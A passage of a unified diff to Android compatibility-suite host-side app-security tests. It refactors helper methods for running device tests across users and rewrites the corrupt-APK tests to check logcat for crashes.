+ runDeviceTests(APP_WITH_DATA_PKG, APP_WITH_DATA_CLASS, APP_WITH_DATA_CREATE_METHOD);
installResult = getDevice().installPackage(getTestAppFile(APP_ACCESS_DATA_APK),
false, options);
assertNull(String.format("failed to install app access data. Reason: %s",
installResult), installResult);
// run appaccessdata's tests which attempt to access appwithdata's private data
- runDeviceTestsAsCurrentUser(APP_ACCESS_DATA_PKG);
+ runDeviceTests(APP_ACCESS_DATA_PKG);
} finally {
getDevice().uninstallPackage(APP_WITH_DATA_PKG);
getDevice().uninstallPackage(APP_ACCESS_DATA_PKG);
@@ -205,8 +204,7 @@
assertNull(String.format("failed to install app with data. Reason: %s", installResult),
installResult);
// run appwithdata's tests to create private data
- runDeviceTestsAsCurrentUser(
- APP_WITH_DATA_PKG, APP_WITH_DATA_CLASS, APP_WITH_DATA_CREATE_METHOD);
+ runDeviceTests(APP_WITH_DATA_PKG, APP_WITH_DATA_CLASS, APP_WITH_DATA_CREATE_METHOD);
getDevice().uninstallPackage(APP_WITH_DATA_PKG);
@@ -215,7 +213,7 @@
assertNull(String.format("failed to install app with data second time. Reason: %s",
installResult), installResult);
// run appwithdata's 'check if file exists' test
- runDeviceTestsAsCurrentUser(APP_WITH_DATA_PKG, APP_WITH_DATA_CLASS,
+ runDeviceTests(APP_WITH_DATA_PKG, APP_WITH_DATA_CLASS,
APP_WITH_DATA_CHECK_NOEXIST_METHOD);
} finally {
getDevice().uninstallPackage(APP_WITH_DATA_PKG);
@@ -249,7 +247,7 @@
// run INSTRUMENT_DIFF_CERT_PKG tests
// this test will attempt to call startInstrumentation directly and verify
// SecurityException is thrown
- runDeviceTestsAsCurrentUser(INSTRUMENT_DIFF_CERT_PKG);
+ runDeviceTests(INSTRUMENT_DIFF_CERT_PKG);
} finally {
getDevice().uninstallPackage(TARGET_INSTRUMENT_PKG);
getDevice().uninstallPackage(INSTRUMENT_DIFF_CERT_PKG);
@@ -287,7 +285,7 @@
assertNull(String.format("failed to install permission app with diff cert. Reason: %s",
installResult), installResult);
// run PERMISSION_DIFF_CERT_PKG tests which try to access the permission
- runDeviceTestsAsCurrentUser(PERMISSION_DIFF_CERT_PKG);
+ runDeviceTests(PERMISSION_DIFF_CERT_PKG);
} finally {
getDevice().uninstallPackage(DECLARE_PERMISSION_PKG);
getDevice().uninstallPackage(DECLARE_PERMISSION_COMPAT_PKG);
@@ -306,14 +304,7 @@
assertTrue("Error text", output.contains("Error"));
}
- private void runDeviceTestsAsCurrentUser(String packageName)
- throws DeviceNotAvailableException {
- Utils.runDeviceTestsAsCurrentUser(getDevice(), packageName, null, null);
- }
-
- private void runDeviceTestsAsCurrentUser(
- String packageName, String className, String methodName)
- throws DeviceNotAvailableException {
- Utils.runDeviceTestsAsCurrentUser(getDevice(), packageName, className, methodName);
+ private void runDeviceTests(String packageName) throws DeviceNotAvailableException {
+ runDeviceTests(packageName, null);
}
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/BaseAppSecurityTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/BaseAppSecurityTest.java
index c463d5a..5e2a97b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/BaseAppSecurityTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/BaseAppSecurityTest.java
@@ -32,6 +32,7 @@
/** Whether multi-user is supported. */
protected boolean mSupportsMultiUser;
+ protected boolean mIsSplitSystemUser;
protected int mPrimaryUserId;
/** Users we shouldn't delete in the tests */
private ArrayList<Integer> mFixedUsers;
@@ -41,12 +42,22 @@
Assert.assertNotNull(getBuild()); // ensure build has been set before test is run.
mSupportsMultiUser = getDevice().getMaxNumberOfUsersSupported() > 1;
+ mIsSplitSystemUser = checkIfSplitSystemUser();
mPrimaryUserId = getDevice().getPrimaryUserId();
mFixedUsers = new ArrayList<>();
mFixedUsers.add(mPrimaryUserId);
if (mPrimaryUserId != Utils.USER_SYSTEM) {
mFixedUsers.add(Utils.USER_SYSTEM);
}
+ getDevice().switchUser(mPrimaryUserId);
+ }
+
+ private boolean checkIfSplitSystemUser() throws DeviceNotAvailableException {
+ final String commandOuput = getDevice().executeShellCommand(
+ "getprop ro.fw.system_user_split");
+ return "y".equals(commandOuput) || "yes".equals(commandOuput)
+ || "1".equals(commandOuput) || "true".equals(commandOuput)
+ || "on".equals(commandOuput);
}
protected void installTestAppForUser(String apk, int userId) throws Exception {
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ClassloaderSplitsTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ClassloaderSplitsTest.java
index edcbd97..6830f30 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ClassloaderSplitsTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ClassloaderSplitsTest.java
@@ -16,7 +16,6 @@
package android.appsecurity.cts;
import android.platform.test.annotations.AppModeFull;
-import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import com.android.tradefed.testtype.IBuildReceiver;
import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
@@ -62,32 +61,32 @@
@AppModeFull // TODO: Needs porting to instant
public void testBaseClassLoader() throws Exception {
new InstallMultiple().addApk(APK_BASE).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "testBaseClassLoader");
+ runDeviceTests(getDevice(), PKG, TEST_CLASS, "testBaseClassLoader");
}
@Test
@AppModeFull // TODO: Needs porting to instant
public void testFeatureAClassLoader() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_FEATURE_A).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "testBaseClassLoader");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "testFeatureAClassLoader");
+ runDeviceTests(getDevice(), PKG, TEST_CLASS, "testBaseClassLoader");
+ runDeviceTests(getDevice(), PKG, TEST_CLASS, "testFeatureAClassLoader");
}
@Test
@AppModeFull // TODO: Needs porting to instant
public void testFeatureBClassLoader() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_FEATURE_A).addApk(APK_FEATURE_B).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "testBaseClassLoader");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "testFeatureAClassLoader");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "testFeatureBClassLoader");
+ runDeviceTests(getDevice(), PKG, TEST_CLASS, "testBaseClassLoader");
+ runDeviceTests(getDevice(), PKG, TEST_CLASS, "testFeatureAClassLoader");
+ runDeviceTests(getDevice(), PKG, TEST_CLASS, "testFeatureBClassLoader");
}
@Test
@AppModeFull // TODO: Needs porting to instant
public void testReceiverClassLoaders() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_FEATURE_A).addApk(APK_FEATURE_B).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "testBaseClassLoader");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "testAllReceivers");
+ runDeviceTests(getDevice(), PKG, TEST_CLASS, "testBaseClassLoader");
+ runDeviceTests(getDevice(), PKG, TEST_CLASS, "testAllReceivers");
}
private class InstallMultiple extends BaseInstallMultiple<InstallMultiple> {
@@ -95,10 +94,4 @@
super(getDevice(), getBuild(), null);
}
}
-
- private void runDeviceTestsAsCurrentUser(
- String packageName, String testClassName, String testMethodName)
- throws DeviceNotAvailableException {
- Utils.runDeviceTestsAsCurrentUser(getDevice(), packageName, testClassName, testMethodName);
- }
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/CorruptApkTests.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/CorruptApkTests.java
index 8516c73..6849d0c 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/CorruptApkTests.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/CorruptApkTests.java
@@ -15,24 +15,18 @@
*/
package android.appsecurity.cts;
-import static org.junit.Assert.assertFalse;
-import static org.junit.Assert.assertNotEquals;
-import static org.junit.Assert.assertNotNull;
-import static org.junit.Assert.fail;
+import static com.google.common.truth.Truth.assertThat;
import android.platform.test.annotations.AppModeFull;
-import com.android.ddmlib.Log.LogLevel;
import com.android.compatibility.common.tradefed.build.CompatibilityBuildHelper;
import com.android.tradefed.build.IBuildInfo;
-import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.log.LogUtil.CLog;
+import com.android.tradefed.result.InputStreamSource;
import com.android.tradefed.testtype.DeviceTestCase;
import com.android.tradefed.testtype.IBuildReceiver;
import com.android.tradefed.util.FileUtil;
import org.junit.After;
-import org.junit.Assert;
import org.junit.Before;
import java.io.File;
@@ -41,115 +35,104 @@
* Set of tests that verify that corrupt APKs are properly rejected by PackageManager and
* do not cause the system to crash.
*/
-@AppModeFull(reason = "the corrupt APKs were provided as-is and we cannot modify them to comply with instant mode")
+@AppModeFull // TODO: Needs porting to instant
public class CorruptApkTests extends DeviceTestCase implements IBuildReceiver {
+ private final String B71360999_PKG = "com.android.appsecurity.b71360999";
+ private final String B71361168_PKG = "com.android.appsecurity.b71361168";
+ private final String B79488511_PKG = "com.android.appsecurity.b79488511";
private IBuildInfo mBuildInfo;
- /** A container for information about the system_server process. */
- private class SystemServerInformation {
- final long mPid;
- final long mStartTime;
-
- SystemServerInformation(long pid, long startTime) {
- this.mPid = pid;
- this.mStartTime = startTime;
- }
-
- @Override
- public boolean equals(Object actual) {
- return (actual instanceof SystemServerInformation)
- && mPid == ((SystemServerInformation) actual).mPid
- && mStartTime == ((SystemServerInformation) actual).mStartTime;
- }
- }
-
- /** Retrieves the process id and elapsed run time of system_server. */
- private SystemServerInformation retrieveInfo() throws DeviceNotAvailableException {
- ITestDevice device = getDevice();
-
- // Retrieve the process id of system_server
- String pidResult = device.executeShellCommand("pidof system_server").trim();
- assertNotNull("Failed to retrieve pid of system_server", pidResult);
- long pid = 0;
- try {
- pid = Long.parseLong(pidResult);
- } catch (NumberFormatException | IndexOutOfBoundsException e) {
- fail("Unable to parse pid of system_server '" + pidResult + "'");
- }
-
- // Retrieve the start time of system_server
- long startTime = 0;
- String pidStats = device.executeShellCommand("cat /proc/" + pid + "/stat");
- assertNotNull("Failed to retrieve stat of system_server with pid '" + pid + "'", pidStats);
- try {
- String startTimeJiffies = pidStats.split("\\s+")[21];
- startTime = Long.parseLong(startTimeJiffies);
- } catch (NumberFormatException | IndexOutOfBoundsException e) {
- fail("Unable to parse system_server stat file '" + pidStats + "'");
- }
-
- return new SystemServerInformation(pid, startTime);
- }
-
@Override
public void setBuild(IBuildInfo buildInfo) {
mBuildInfo = buildInfo;
}
- /** Uninstall any test APKs already present on device. */
- private void uninstallApks() throws DeviceNotAvailableException {
- ITestDevice device = getDevice();
- device.uninstallPackage("com.android.appsecurity.b71360999");
- device.uninstallPackage("com.android.appsecurity.b71361168");
- device.uninstallPackage("com.android.appsecurity.b79488511");
- }
-
@Before
@Override
public void setUp() throws Exception {
super.setUp();
- uninstallApks();
+ uninstall(B71360999_PKG);
+ uninstall(B71361168_PKG);
+ uninstall(B79488511_PKG);
}
@After
@Override
public void tearDown() throws Exception {
super.tearDown();
- uninstallApks();
+ uninstall(B71360999_PKG);
+ uninstall(B71361168_PKG);
+ uninstall(B79488511_PKG);
+ }
+
+ /** Uninstall the apk if the test failed previously. */
+ public void uninstall(String pkg) throws Exception {
+ ITestDevice device = getDevice();
+ if (device.getInstalledPackageNames().contains(pkg)) {
+ device.uninstallPackage(pkg);
+ }
}
/**
- * Asserts that installing the application does not cause a native error causing system_server
- * to crash (typically the result of a buffer overflow or an out-of-bounds read).
+ * Tests that apks described in b/71360999 do not install successfully.
*/
- private void assertInstallDoesNotCrashSystem(String apk) throws Exception {
- SystemServerInformation beforeInfo = retrieveInfo();
+ public void testFailToInstallCorruptStringPoolHeader_b71360999() throws Exception {
+ final String APK_PATH = "CtsCorruptApkTests_b71360999.apk";
+ assertInstallNoFatalError(APK_PATH, B71360999_PKG);
+ }
- final String result = getDevice().installPackage(
- new CompatibilityBuildHelper(mBuildInfo).getTestFile(apk),
- false /*reinstall*/);
- CLog.logAndDisplay(LogLevel.INFO, "Result: '" + result + "'");
- if (result != null) {
- assertFalse("Install package segmentation faulted",
- result.toLowerCase().contains("segmentation fault"));
+ /**
+ * Tests that apks described in b/71361168 do not install successfully.
+ */
+ public void testFailToInstallCorruptStringPoolHeader_b71361168() throws Exception {
+ final String APK_PATH = "CtsCorruptApkTests_b71361168.apk";
+ assertInstallNoFatalError(APK_PATH, B71361168_PKG);
+ }
+
+ /**
+ * Tests that apks described in b/79488511 do not install successfully.
+ */
+ public void testFailToInstallCorruptStringPoolHeader_b79488511() throws Exception {
+ final String APK_PATH = "CtsCorruptApkTests_b79488511.apk";
+ assertInstallNoFatalError(APK_PATH, B79488511_PKG);
+ }
+
+ /**
+ * Assert that installing the app does not cause a native error caused by a buffer overflow
+ * or an out-of-bounds read.
+ **/
+ private void assertInstallNoFatalError(String filename, String pkg) throws Exception {
+ ITestDevice device = getDevice();
+ device.clearLogcat();
+
+ final String result = device.installPackage(
+ new CompatibilityBuildHelper(mBuildInfo).getTestFile(filename),
+ true /*reinstall*/);
+
+ // Starting from P, corrupt apks should always fail to install
+ if (device.getApiLevel() >= 28) {
+ assertThat(result).isNotNull();
+ assertThat(result).isNotEmpty();
+ assertThat(device.getInstalledPackageNames()).doesNotContain(pkg);
}
- assertEquals("system_server restarted", beforeInfo, retrieveInfo());
- }
-
- /** Tests that installing the APK described in b/71360999 does not crash the device. */
- public void testSafeInstallOfCorruptAPK_b71360999() throws Exception {
- assertInstallDoesNotCrashSystem("CtsCorruptApkTests_b71360999.apk");
- }
-
- /** Tests that installing the APK described in b/71361168 does not crash the device. */
- public void testSafeInstallOfCorruptAPK_b71361168() throws Exception {
- assertInstallDoesNotCrashSystem("CtsCorruptApkTests_b71361168.apk");
- }
-
- /** Tests that installing the APK described in b/79488511 does not crash the device. */
- public void testSafeInstallOfCorruptAPK_b79488511() throws Exception {
- assertInstallDoesNotCrashSystem("CtsCorruptApkTests_b79488511.apk");
+ // This catches if the device fails to install the app because a segmentation fault
+ // or out of bounds read created by the bug occurs
+ File tmpTxtFile = null;
+ InputStreamSource source = device.getLogcat(200 * 1024);
+ try {
+ assertNotNull(source);
+ tmpTxtFile = FileUtil.createTempFile("logcat", ".txt");
+ FileUtil.writeToFile(source.createInputStream(), tmpTxtFile);
+ String s = FileUtil.readStringFromFile(tmpTxtFile);
+ assertFalse(s.contains("SIGSEGV"));
+ assertFalse(s.contains("==ERROR"));
+ } finally {
+ source.close();
+ if (tmpTxtFile != null) {
+ FileUtil.deleteFile(tmpTxtFile);
+ }
+ }
}
}
\ No newline at end of file
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
index 4dc768a..2d1386f 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
@@ -58,9 +58,11 @@
private static final long SHUTDOWN_TIME_MS = 30 * 1000;
+ private int[] mUsers;
+
@Before
public void setUp() throws Exception {
- Utils.prepareSingleUser(getDevice());
+ mUsers = Utils.prepareSingleUser(getDevice());
assertNotNull(getAbi());
assertNotNull(getBuild());
@@ -152,13 +154,12 @@
// To receive boot broadcasts, kick our other app out of stopped state
getDevice().executeShellCommand("am start -a android.intent.action.MAIN"
- + " --user current"
+ " -c android.intent.category.LAUNCHER com.android.cts.splitapp/.MyActivity");
// Give enough time for PackageManager to persist stopped state
Thread.sleep(15000);
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testSetUp");
+ runDeviceTests(PKG, CLASS, "testSetUp", mUsers);
// Give enough time for vold to update keys
Thread.sleep(15000);
@@ -178,16 +179,16 @@
if (doTest) {
if (MODE_NONE.equals(mode)) {
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testVerifyUnlockedAndDismiss");
+ runDeviceTests(PKG, CLASS, "testVerifyUnlockedAndDismiss", mUsers);
} else {
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testVerifyLockedAndDismiss");
+ runDeviceTests(PKG, CLASS, "testVerifyLockedAndDismiss", mUsers);
}
}
} finally {
try {
// Remove secure lock screens and tear down test app
- runDeviceTestsAsCurrentUser(PKG, CLASS, "testTearDown");
+ runDeviceTests(PKG, CLASS, "testTearDown", mUsers);
} finally {
getDevice().uninstallPackage(PKG);
@@ -204,10 +205,12 @@
}
}
- private void runDeviceTestsAsCurrentUser(
- String packageName, String testClassName, String testMethodName)
- throws DeviceNotAvailableException {
- Utils.runDeviceTestsAsCurrentUser(getDevice(), packageName, testClassName, testMethodName);
+ private void runDeviceTests(String packageName, String testClassName, String testMethodName,
+ int... users) throws DeviceNotAvailableException {
+ for (int user : users) {
+ Log.d(TAG, "runDeviceTests " + testMethodName + " u" + user);
+ runDeviceTests(getDevice(), packageName, testClassName, testMethodName, user, null);
+ }
}
private String getFbeMode() throws Exception {
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/InstantAppUserTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/InstantAppUserTest.java
index aa7998b..b6cd29d 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/InstantAppUserTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/InstantAppUserTest.java
@@ -56,7 +56,6 @@
/** Users we shouldn't delete in the tests */
private ArrayList<Integer> mFixedUsers;
private int[] mTestUser = new int[2];
- private int mStartingUser;
@Override
public void setAbi(IAbi abi) {
@@ -84,7 +83,6 @@
if (mPrimaryUserId != USER_SYSTEM) {
mFixedUsers.add(USER_SYSTEM);
}
- mStartingUser = getDevice().getCurrentUser();
getDevice().switchUser(mPrimaryUserId);
mTestUser[0] = users[1];
@@ -99,7 +97,6 @@
if (mSupportsMultiUser) {
uninstallTestPackages();
}
- getDevice().switchUser(mStartingUser);
super.tearDown();
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/IsolatedSplitsTests.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/IsolatedSplitsTests.java
index a9ac9b0..dc08b6c 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/IsolatedSplitsTests.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/IsolatedSplitsTests.java
@@ -17,7 +17,6 @@
import android.platform.test.annotations.AppModeFull;
import com.android.tradefed.build.IBuildInfo;
-import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.testtype.DeviceTestCase;
import com.android.tradefed.testtype.IBuildReceiver;
@@ -59,12 +58,12 @@
public void testInstallBase() throws Exception {
new InstallMultiple().addApk(APK_BASE).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadDefault");
}
public void testInstallBaseAndConfigSplit() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_BASE_pl).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadPolishLocale");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadPolishLocale");
}
public void testInstallMissingDependency() throws Exception {
@@ -73,52 +72,52 @@
public void testInstallOneFeatureSplit() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_FEATURE_A).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadDefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureADefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureAReceivers");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureADefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureAReceivers");
}
public void testInstallOneFeatureSplitAndConfigSplits() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_FEATURE_A).addApk(APK_BASE_pl)
.addApk(APK_FEATURE_A_pl).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadPolishLocale");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureAPolishLocale");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadPolishLocale");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureAPolishLocale");
}
public void testInstallDependentFeatureSplits() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_FEATURE_A).addApk(APK_FEATURE_B).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadDefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureADefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureBDefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureAAndBReceivers");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureADefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureBDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureAAndBReceivers");
}
public void testInstallDependentFeatureSplitsAndConfigSplits() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_FEATURE_A).addApk(APK_FEATURE_B)
.addApk(APK_BASE_pl).addApk(APK_FEATURE_A_pl).addApk(APK_FEATURE_B_pl).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadPolishLocale");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureAPolishLocale");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureBPolishLocale");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadPolishLocale");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureAPolishLocale");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureBPolishLocale");
}
public void testInstallAllFeatureSplits() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_FEATURE_A).addApk(APK_FEATURE_B)
.addApk(APK_FEATURE_C).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadDefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureADefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureBDefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureCDefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureAAndBAndCReceivers");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureADefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureBDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureCDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureAAndBAndCReceivers");
}
public void testInstallAllFeatureSplitsAndConfigSplits() throws Exception {
new InstallMultiple().addApk(APK_BASE).addApk(APK_FEATURE_A).addApk(APK_FEATURE_B)
.addApk(APK_FEATURE_C).addApk(APK_BASE_pl).addApk(APK_FEATURE_A_pl)
.addApk(APK_FEATURE_C_pl).run();
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadDefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureADefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureBDefault");
- runDeviceTestsAsCurrentUser(PKG, TEST_CLASS, "shouldLoadFeatureCDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureADefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureBDefault");
+ Utils.runDeviceTests(getDevice(), PKG, TEST_CLASS, "shouldLoadFeatureCDefault");
}
@Override
@@ -131,10 +130,4 @@
super(getDevice(), mBuildInfo, null);
}
}
-
- private void runDeviceTestsAsCurrentUser(
- String packageName, String testClassName, String testMethodName)
- throws DeviceNotAvailableException {
- Utils.runDeviceTestsAsCurrentUser(getDevice(), packageName, testClassName, testMethodName);
- }
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/MajorVersionTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/MajorVersionTest.java
index 512a753..e1d913e 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/MajorVersionTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/MajorVersionTest.java
@@ -71,7 +71,7 @@
assertNull(getDevice().installPackage(
mBuildHelper.getTestFile(APK_000000000000ffff), false, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
getDevice().uninstallPackage(PKG);
}
@@ -79,7 +79,7 @@
assertNull(getDevice().installPackage(
mBuildHelper.getTestFile(APK_000000ff00000000), false, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
getDevice().uninstallPackage(PKG);
}
@@ -87,19 +87,19 @@
assertNull(getDevice().installPackage(
mBuildHelper.getTestFile(APK_000000000000ffff), false, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
assertNull(getDevice().installPackage(
mBuildHelper.getTestFile(APK_00000000ffffffff), true, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
assertNull(getDevice().installPackage(
mBuildHelper.getTestFile(APK_000000ff00000000), true, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
assertNull(getDevice().installPackage(
mBuildHelper.getTestFile(APK_000000ffffffffff), true, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
getDevice().uninstallPackage(PKG);
}
@@ -107,29 +107,29 @@
assertNull(getDevice().installPackage(
mBuildHelper.getTestFile(APK_000000ffffffffff), false, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
assertEquals("INSTALL_FAILED_VERSION_DOWNGRADE", getDevice().installPackage(
mBuildHelper.getTestFile(APK_00000000ffffffff), true, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
assertEquals("INSTALL_FAILED_VERSION_DOWNGRADE", getDevice().installPackage(
mBuildHelper.getTestFile(APK_000000ff00000000), true, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
assertEquals("INSTALL_FAILED_VERSION_DOWNGRADE", getDevice().installPackage(
mBuildHelper.getTestFile(APK_000000000000ffff), true, false));
assertTrue(getDevice().getInstalledPackageNames().contains(PKG));
- runDeviceTestsAsCurrentUser("testCheckVersion");
+ runVersionDeviceTests("testCheckVersion");
getDevice().uninstallPackage(PKG);
}
- private void runDeviceTestsAsCurrentUser(String testMethodName)
+ private void runVersionDeviceTests(String testMethodName)
throws DeviceNotAvailableException {
- runDeviceTestsAsCurrentUser(PKG, PKG + ".VersionTest", testMethodName);
+ runDeviceTests(PKG, PKG + ".VersionTest", testMethodName);
}
- private void runDeviceTestsAsCurrentUser(String packageName, String testClassName, String testMethodName)
+ private void runDeviceTests(String packageName, String testClassName, String testMethodName)
throws DeviceNotAvailableException {
- Utils.runDeviceTestsAsCurrentUser(getDevice(), packageName, testClassName, testMethodName);
+ Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
}
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/PackageResolutionHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/PackageResolutionHostTest.java
index 9337d97..8e409bb 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/PackageResolutionHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/PackageResolutionHostTest.java
@@ -43,7 +43,6 @@
@Before
public void setUp() throws Exception {
- super.setUp();
getDevice().uninstallPackage(TINY_PKG);
mBuildHelper = new CompatibilityBuildHelper(getBuild());
}
@@ -57,7 +56,7 @@
@AppModeFull // TODO: Needs porting to instant
public void testResolveOrderedActivity() throws Exception {
getDevice().installPackage(mBuildHelper.getTestFile(TINY_APK), true);
